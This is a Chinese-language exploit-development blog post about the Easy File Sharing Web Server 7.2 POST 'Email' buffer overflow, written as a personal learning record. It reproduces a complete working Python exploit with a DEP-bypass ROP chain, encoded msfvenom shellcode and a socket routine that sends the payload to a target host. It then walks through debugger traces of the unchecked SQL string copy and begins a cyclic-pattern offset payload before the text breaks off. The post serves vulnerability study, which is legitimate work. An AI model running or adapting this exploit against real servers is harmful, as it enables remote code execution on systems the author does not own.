0x00前言
首先,爲什麼沒有fuzzing-02。。。因爲在寫02的時候,發現還是重複第一篇的相關內容,寫一半就停了,不過03是我第一次分析別人沒分析過的軟件,並且獨立編寫shellcode,所以記錄一下留作自己的參考。
目標:win7 x64 sp1
源:win10(python)
軟件:Easy File Sharing Web Server(7.2)、Windbg、Immunity Debugger、IDA、msfvenom(Metasploit)
壞字符 : '\x00\x0A\x0D'
0x01軟件逆向開始
一開始很簡單,就和平常一樣,先下載7.2的軟件,然後安裝打開,百度查找POC,然後讓軟件崩潰就好了。先附上自己找到的POC代碼。
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
# Exploit Author: bl4ck h4ck3r
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows XP SP2, Windows 2008 R2 x64
import socket
import struct
import sys
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <host>\n"
exit()
# 0x1002280a : # ADD ESP,1004 # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
ret = struct.pack("<I", 0x1002280a)
# nopsled
shellcode = "\x90"*200
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70"
shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74"
shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c"
shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58"
shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f"
shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c"
shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47"
shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62"
shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c"
shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71"
shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73"
shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69"
shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61"
shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61"
shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43"
shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55"
shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61"
shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b"
shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64"
shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54"
shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a"
shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a"
shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a"
shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30"
shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f"
shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35"
shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d"
shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c"
shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35"
shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a"
shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31"
shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45"
shellcode += "\x45\x50\x41\x41"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
# 0x00000000, # [-] Unable to find gadget to put 00000201 into ebx
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0xFFFFFDFE, # -202
0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll]
0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
0x100218f9, # POP EBP # RETN [ImageLoad.dll]
0x61c24169, # & push esp # ret [sqlite3.dll]
0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x1001bd98, # POP ECX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x61c373a4, # POP EDI # RETN [sqlite3.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x90909090, # nop
0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password")
s.close()
後面會對這個POC代碼進行修改的,現在只是先用它的產生報錯,然後判斷爲什麼出錯了,然後軟件成功出錯。
之前學了windbg,而且沒有任何文檔告訴我哪裏出錯了,所以我第一個想法是先打開windbg看他的堆棧信息。使用windbg附加程序,然後使程序再次報錯。
(a48.f2c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
ntdll!DbgBreakPoint:
00000000`77bc0590 cc int 3
0:009> g
(a48.df4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
66463766 ?? ???
0:002:x86> kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
044471a8 33674632 46346746 04440027 00001001 0x66463766
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
044471c4 0052d80b 0294debc 0294ffcd 0000001e 0x33674632
04447218 0042d452 0018d790 00000000 0000028c fsws+0x12d80b
0444721c 0018d790 00000000 0000028c 00000000 fsws+0x2d452
04447220 00000000 0000028c 00000000 00000000 0x18d790
0:002:x86> ub fsws+0x12d80b
fsws+0x12d7f6:
0052d7f6 8bce mov ecx,esi
0052d7f8 e817feffff call fsws+0x12d614 (0052d614)
0052d7fd 8b07 mov eax,dword ptr [edi]
0052d7ff 53 push ebx
0052d800 034510 add eax,dword ptr [ebp+10h]
0052d803 50 push eax
0052d804 ff36 push dword ptr [esi]
0052d806 e8e5eafcff call fsws+0xfc2f0 (004fc2f0)
0:002:x86> ub fsws+0x2d452
fsws+0x2d438:
0042d438 8d4d90 lea ecx,[ebp-70h]
0042d43b c645fc00 mov byte ptr [ebp-4],0
0042d43f 0f9fc3 setg bl
0042d442 e860031000 call fsws+0x12d7a7 (0052d7a7)
0042d447 84db test bl,bl
0042d449 7407 je fsws+0x2d452 (0042d452)
0042d44b 8bcf mov ecx,edi
0042d44d e8ae8cfeff call fsws+0x16100 (00416100)
查看了兩個函數的情況,然後兩個函數裏面的兩個call,然後就發現,是第二個函數 fsws+0x2d452,在數據包發過來的時候,會下端,第一個函數,就算不發數據包他也會下斷點
程序停住了,這個時候就比較笨,一步一步去執行,然後看哪個函數出錯了,我就當累計經驗了,然後這裏發現執行到42d44d的時候程序出錯,所以這個函數我們着重跟入。
還是比較快的,因爲他就是fsws+0x2d452裏面的第二個函數,然後我們重新啓動,然後再跟入,這裏後面就統一的套路了,我就不詳細介紹了,直接給出他們的函數路徑。
fun_0042d44d->fun_0041625d->fun_0049758a->fun_004f9693->fun_00500d72
然後第一步就結束了,然後開始分析他到底哪裏出差了,他爲什麼會出差
0x02 函數逆向
首先,我們看到POC中,他是有兩個參數Email和getPassword,而且shellcode在email中,所以猜測是email處理的時候,產生了溢出。注:getPassword必須要,爲什麼要,後面逆向的時候大家就知道了。
0x02.1(fun_0042d44d)
00416100 /$ 6A FF PUSH -1
00416102 |. 68 88F25400 PUSH fsws.0054F288 ; SE handler installation
00416107 |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0] ; FS寄存器指向當前線程的SEH結構[0]代表第一個偏移
0041610D |. 50 PUSH EAX
0041610E |. 64:8925 000000>MOV DWORD PTR FS:[0],ESP ; 在SEH結構中添了 ESP地址
00416115 |. 83EC 54 SUB ESP,54
00416118 |. A1 D4385A00 MOV EAX,DWORD PTR DS:[5A38D4] ; 將5A38D4數據區的數據給了 EAX
0041611D |. 53 PUSH EBX
0041611E |. 55 PUSH EBP
0041611F |. 56 PUSH ESI
00416120 |. 57 PUSH EDI
00416121 |. 8BF1 MOV ESI,ECX
00416123 |. 894424 10 MOV DWORD PTR SS:[ESP+10],EAX
00416127 |. 8D9E 64020000 LEA EBX,DWORD PTR DS:[ESI+264] ; 這個地址存的是 post請求的詳細內容的確數據地址
0041612D |. 68 5C8D5900 PUSH fsws.00598D5C ; ASCII "Email="
00416132 |. 8BCB MOV ECX,EBX ; 又把數據的地址複製給了ecx
00416134 |. C74424 70 0000>MOV DWORD PTR SS:[ESP+70],0
0041613C |. E8 7CC81000 CALL fsws.005229BD ; 在處理髮來的參數詳細信息,就是遭到email參數的地址,然後返回具體的偏移地址,68
00416141 |. 8BE8 MOV EBP,EAX
00416143 |. 85ED TEST EBP,EBP
00416145 |. 0F8E 1F040000 JLE fsws.0041656A
0041614B |. BF 5C8D5900 MOV EDI,fsws.00598D5C ; ASCII "Email="
00416150 |. 83C9 FF OR ECX,FFFFFFFF
00416153 |. 33C0 XOR EAX,EAX
00416155 |. 68 4C8D5900 PUSH fsws.00598D4C ; ASCII "&getPassword="
0041615A |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0041615C |. F7D1 NOT ECX
0041615E |. 49 DEC ECX
0041615F |. 03E9 ADD EBP,ECX
00416161 |. 8BCB MOV ECX,EBX
00416163 |. E8 55C81000 CALL fsws.005229BD ; 與上面的函數相同,計算這個參數在數據包中的偏移,106e
00416168 |. 2BC5 SUB EAX,EBP ; 減去了email的長度,所以是繼他之後的6e
0041616A |. 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20]
0041616E |. 50 PUSH EAX ; email的長度
0041616F |. 55 PUSH EBP ; getpassword參數的偏移地址
00416170 |. 51 PUSH ECX ; 這個地址記錄了getpasswode在內存中的地址,就是前面還有幾個A
00416171 |. 8BCB MOV ECX,EBX
00416173 |. E8 43C61000 CALL fsws.005227BB
00416178 |. 50 PUSH EAX ; 獲取到了記錄email數據地址的地址
00416179 |. 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
0041617D |. C64424 70 01 MOV BYTE PTR SS:[ESP+70],1
00416182 |. E8 59771100 CALL fsws.0052D8E0
00416187 |. 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20] ; 把這個地址了ecx
0041618B |. C64424 6C 00 MOV BYTE PTR SS:[ESP+6C],0
00416190 |. E8 12761100 CALL fsws.0052D7A7
00416195 |. 83CB FF OR EBX,FFFFFFFF
00416198 |. 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0041619C |. 53 PUSH EBX
0041619D |. 6A 00 PUSH 0
0041619F |. E8 337A1100 CALL fsws.0052DBD7
004161A4 |. 50 PUSH EAX
004161A5 |. E8 26790C00 CALL fsws.004DDAD0 ; 又返回了一個他的長度
然後在41625D之前,他一直在處理數據包的詳細信息,這個時候的數據包,他還沒寫入棧中,保存在了數據區,獲取他的長度,和找到email和getpasswd兩個參數的詳細信息
0x02.2(fun_0041625d)
0041625D |. E8 7E120800 CALL fsws.004974E0 ; 開始處理email的數據了
跟入
004974E0 /$ 64:A1 00000000 MOV EAX,DWORD PTR FS:[0] ; seh的返回地址,應該是之前的函數地址
004974E6 |. 6A FF PUSH -1
004974E8 |. 68 51985500 PUSH fsws.00559851
004974ED |. 50 PUSH EAX
004974EE |. B8 10100000 MOV EAX,1010
004974F3 |. 64:8925 000000>MOV DWORD PTR FS:[0],ESP ; 這一段我覺得是try,失敗就返回之前的函數繼續操作
004974FA |. E8 01290600 CALL fsws.004F9E00
004F9E00 /$ 51 PUSH ECX
004F9E01 |. 3D 00100000 CMP EAX,1000
004F9E06 |. 8D4C24 08 LEA ECX,DWORD PTR SS:[ESP+8]
004F9E0A |. 72 14 JB SHORT fsws.004F9E20
004F9E0C |> 81E9 00100000 /SUB ECX,1000 ; 這個地址存了select * from sqltable這個數據
004F9E12 |. 2D 00100000 |SUB EAX,1000
004F9E17 |. 8501 |TEST DWORD PTR DS:[ECX],EAX
004F9E19 |. 3D 00100000 |CMP EAX,1000
004F9E1E |.^73 EC \JNB SHORT fsws.004F9E0C
004F9E20 |> 2BC8 SUB ECX,EAX
004F9E22 |. 8BC4 MOV EAX,ESP
004F9E24 |. 8501 TEST DWORD PTR DS:[ECX],EAX
004F9E26 |. 8BE1 MOV ESP,ECX
004F9E28 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
004F9E2A |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
004F9E2D |. 50 PUSH EAX
004F9E2E \. C3 RETN
這個函數是對email的數據進行去數據庫查找,拼接了一個SQL語句
004974FF |. 53 PUSH EBX
00497500 |. 56 PUSH ESI
00497501 |. 8BF1 MOV ESI,ECX
00497503 |. 68 2C285A00 PUSH fsws.005A282C ; ASCII "sqltable"
00497508 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0049750C |. E8 04630900 CALL fsws.0052D815
00497511 |. 8B8424 3010000>MOV EAX,DWORD PTR SS:[ESP+1030]
00497518 |. C78424 2010000>MOV DWORD PTR SS:[ESP+1020],0
00497523 |. 85C0 TEST EAX,EAX
00497525 |. 74 0A JE SHORT fsws.00497531
00497527 |. 50 PUSH EAX
00497528 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0049752C |. E8 FF630900 CALL fsws.0052D930
00497531 |> 8B8424 2810000>MOV EAX,DWORD PTR SS:[ESP+1028]
00497538 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0049753C |. 50 PUSH EAX
0049753D |. E8 D3620900 CALL fsws.0052D815
00497542 |. 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C]
00497546 |. B3 01 MOV BL,1
00497548 |. 889C24 2010000>MOV BYTE PTR SS:[ESP+1020],BL
0049754F |. 8B48 F8 MOV ECX,DWORD PTR DS:[EAX-8]
00497552 |. 85C9 TEST ECX,ECX
00497554 |. 0F8E B6000000 JLE fsws.00497610
0049755A |. 57 PUSH EDI
0049755B |. 8BBC24 3010000>MOV EDI,DWORD PTR SS:[ESP+1030]
00497562 |. 57 PUSH EDI
00497563 |. 50 PUSH EAX
00497564 |. 8D4E 10 LEA ECX,DWORD PTR DS:[ESI+10]
00497567 |. 68 5C285A00 PUSH fsws.005A285C ; ASCII " where %s='%s'"
0049756C |. 51 PUSH ECX
0049756D |. E8 D1B70800 CALL fsws.00522D43
00497572 |. 8B5424 20 MOV EDX,DWORD PTR SS:[ESP+20]
00497576 |. 8B4424 1C MOV EAX,DWORD PTR SS:[ESP+1C]
0049757A |. 83C4 10 ADD ESP,10
0049757D |. 8D4C24 1C LEA ECX,DWORD PTR SS:[ESP+1C]
00497581 |. 57 PUSH EDI
00497582 |. 52 PUSH EDX
00497583 |. 50 PUSH EAX
00497584 |. 68 3C285A00 PUSH fsws.005A283C ; ASCII "select * from %s where %s='%s'"
00497589 |. 51 PUSH ECX ; 有個數據庫的操作
0049758A |. E8 DB200600 CALL fsws.004F966A ; 好像是進行數據的審覈了
以上代碼是是對我們email參數的一個操作,是程序鏡像了select * from sqltable where email=shellcode
這樣一個操作,不過就是這樣拼接的時候,沒有對長度進行校驗,造成了溢出
0x02.3(fun_0049758A)
004F966A /$ 55 PUSH EBP
004F966B |. 8BEC MOV EBP,ESP
004F966D |. 83EC 20 SUB ESP,20
004F9670 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
004F9673 |. 56 PUSH ESI
004F9674 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX
004F9677 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
004F967A |. 8D45 10 LEA EAX,DWORD PTR SS:[EBP+10]
004F967D |. C745 EC 420000>MOV DWORD PTR SS:[EBP-14],42
004F9684 |. 50 PUSH EAX
004F9685 |. 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20]
004F9688 |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
004F968B |. C745 E4 FFFFFF>MOV DWORD PTR SS:[EBP-1C],7FFFFFFF
004F9692 |. 50 PUSH EAX
004F9693 |. E8 A86F0000 CALL fsws.00500640
以上就是將select 語句壓入了棧,然後壓入了一些相關信息,要在004F9693函數中調用了
然後9693函數開始對函數進行數據進行復制
這裏先是將SQL語句先壓入棧,然後在計算數據的長度,然後拼接上去,
00500AD3 |> 8BD6 |/MOV EDX,ESI ; 這裏開始就是計算他的長度了
00500AD5 |. 4E ||DEC ESI
00500AD6 |. 85D2 ||TEST EDX,EDX
00500AD8 |. 74 08 ||JE SHORT fsws.00500AE2
00500ADA |. 8038 00 ||CMP BYTE PTR DS:[EAX],0
00500ADD |. 74 03 ||JE SHORT fsws.00500AE2
00500ADF |. 40 ||INC EAX
00500AE0 |.^EB F1 |\JMP SHORT fsws.00500AD3
00500AE2 |> 2BC1 |SUB EAX,ECX ; 計算出來是1000
計算完數據的長度後,開始拼接
其實00500D72我個人覺得這個函數就是我們正向裏面的%s的處理,因爲前面的select也有這個函數的執行
00500E5A |> 0FBE06 /MOVSX EAX,BYTE PTR DS:[ESI] ; esi是參數,然後一個字節的大小給eax,就是處理字符的第一個字
00500E5D |. 57 |PUSH EDI ; /Arg3
00500E5E |. 46 |INC ESI ; |
00500E5F |. FF7424 1C |PUSH DWORD PTR SS:[ESP+1C] ; |Arg2 = 08F96138
00500E63 |. 50 |PUSH EAX ; |Arg1
00500E64 |. E8 75FFFFFF |CALL fsws.00500DDE ; \fsws.00500DDE 執行完一個call,堆中就多複製一個字節
00500E69 |. 83C4 0C |ADD ESP,0C
00500E6C |. 833F FF |CMP DWORD PTR DS:[EDI],-1
00500E6F |. 74 07 |JE SHORT fsws.00500E78
00500E71 |. 8BC3 |MOV EAX,EBX
00500E73 |. 4B |DEC EBX
00500E74 |. 85C0 |TEST EAX,EAX
00500E76 |.^7F E2 \JG SHORT fsws.00500E5A
讓我們不停的複製
發現這裏不停的填
直到溢出
直接都溢出到這裏了,然後在函數最後retun的時候,就出錯了,我們可以在IDA中看看他是什麼樣子的,由於知道了他的地址在哪裏,所以直接跳轉過去就好了。
判斷大於0 之後,直接就執行了49758a的函數,然後在看一下00500D72的函數
也沒有判斷長度,直接進行了複製
00500D72裏面也沒有判斷他的長度,只要大於0就直接開始複製了,所以造成了溢出
這裏大家肯定好奇爲什麼getpassword函數還沒講到,在第三篇的利用的時候將,因爲我就是在哪裏卡了好久
0x03(漏洞利用)
先構造4096個字符的大小,這個4096哪裏來的,是在0049758A之前的一個函數。
004974FA
004F9E00 /$ 51 PUSH ECX
004F9E01 |. 3D 00100000 CMP EAX,1000
004F9E06 |. 8D4C24 08 LEA ECX,DWORD PTR SS:[ESP+8]
004F9E0A |. 72 14 JB SHORT fsws.004F9E20
004F9E0C |> 81E9 00100000 /SUB ECX,1000 ; 這個地址存了select * from sqltable這個數據
004F9E12 |. 2D 00100000 |SUB EAX,1000
004F9E17 |. 8501 |TEST DWORD PTR DS:[ECX],EAX
004F9E19 |. 3D 00100000 |CMP EAX,1000
004F9E1E |.^73 EC \JNB SHORT fsws.004F9E0C
004F9E20 |> 2BC8 SUB ECX,EAX
004F9E22 |. 8BC4 MOV EAX,ESP
004F9E24 |. 8501 TEST DWORD PTR DS:[ECX],EAX
004F9E26 |. 8BE1 MOV ESP,ECX
004F9E28 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
004F9E2A |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
004F9E2D |. 50 PUSH EAX
004F9E2E \. C3 RETN
開拓了1000的大小
然後發生我們構造好的數據包
our_code = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo